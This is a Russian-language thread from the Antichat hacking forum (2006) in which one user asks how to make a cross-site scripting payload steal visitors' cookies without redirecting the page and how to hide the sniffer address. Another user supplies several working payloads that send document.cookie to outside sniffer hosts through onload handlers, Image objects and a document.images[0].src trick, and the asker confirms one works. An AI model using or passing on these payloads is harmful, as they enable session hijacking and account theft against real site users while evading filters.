Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Функции с xss (https://forum.antichat.xyz/showthread.php?t=18734)

alex-19841 07.05.2006 02:44

Функции с xss
 
onload='document.location="http://xss.ru/coc.gif?;"+document.cookie'
этот использует функцию onload
также можно
onmouseover
onmoseout
onerror
и т.д
Но проблема со всеми то что, как страница открывается или когда наводишь курсор на картинку то браузер переходит на страницу которую указал в document.location
Как сделать так, чтобы оставалась таже странице но - никуда не перебрасывало но http://xss.ru/coc.gif?;"+document.cookie срабатывало?
Также прочитал http://forum.antichat.ru/thread18719-xss.html
Пробовал закодировать свой http://xss.ru/coc.gif?;"+document.cookie
в base 64
aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2 tpZQ==
и когда это встовлял в
onload='document.location="aHR0cDovL3hzcy5ydS9jb2M uZ2lmPzsiK2RvY3VtZW50LmNvb2tpZQ=='
То сниффер не срабатывал.
Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?

CinerX 07.05.2006 04:14

Попробуй через картинку...
<script>
img = new Image()
img.src = "адресс_снифака"+document.cookie;
</script>

Цитата:

Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?
так ты не кодируй http:// и слеши тоже =))) И тогда все будет работать =)

alex-19841 07.05.2006 06:30

Script не могу использовать - фильтруется.
Пробовал закодировать
http://xss.ru/coc.gif?;"+document.cookie в
http://eHNzLnJ1/Y29jLmdpZg==?;"+ZG9jdW1lbnQuY29va2ll
Не пашет.

alex-19841 07.05.2006 06:37

P.s
Кто чем кодирует и как?

alex-19841 07.05.2006 09:13

Все с проблемой вылета новой страници разобрался, осталось кодировка :)

alex-19841 14.05.2006 13:04

Помогите очень, очень надо
(javascript:document.location='http://site.ru/snf.gif?;'+document.cookie)
Открывается в новом окне, как сделать чтоб это срабатывало как картинка и не перескакивало на другую страницу
чета типо
(javascript:image.src='http://site.ru/snf.gif?;'+document.cookie) - только это не работает
Зарание благодарен.

CinerX 14.05.2006 13:16

Код:

(javascript:img=new Image();img.src="http://site.ru/snf.gif?"+document.cookie)

alex-19841 14.05.2006 13:42

CinerX
Не срабатыват

CinerX 14.05.2006 14:15

Хм... странно...
поробуй тогда так:
Код:

javascript:img=new%20Image();img.src="http://site.ru/snf.gif?"+document.cookie
И вот еще один пример, но он работает только в том случае если есть хоть одна картинка на странице в которую ты будешь совать снифер:
Код:

javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie

alex-19841 15.05.2006 05:35

CinerX
+5 :)
Цитата:

javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
Сработало.
Спасибо :)


Время: 23:45